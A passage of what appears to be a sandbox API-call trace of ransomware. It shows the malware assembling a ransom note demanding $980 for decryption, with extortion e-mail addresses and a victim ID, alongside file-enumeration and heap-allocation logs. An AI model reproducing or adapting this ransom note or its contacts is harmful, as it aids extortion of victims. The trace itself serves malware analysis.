than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.978] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.980] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3820340, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3820340, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.980] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0127.980] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3820340, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3820340, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3820340, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.980] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3820340, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3820340, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3820340, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.980] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.980] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.980] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.981] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.983] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.984] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.984] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.986] RtlAllocateHeap 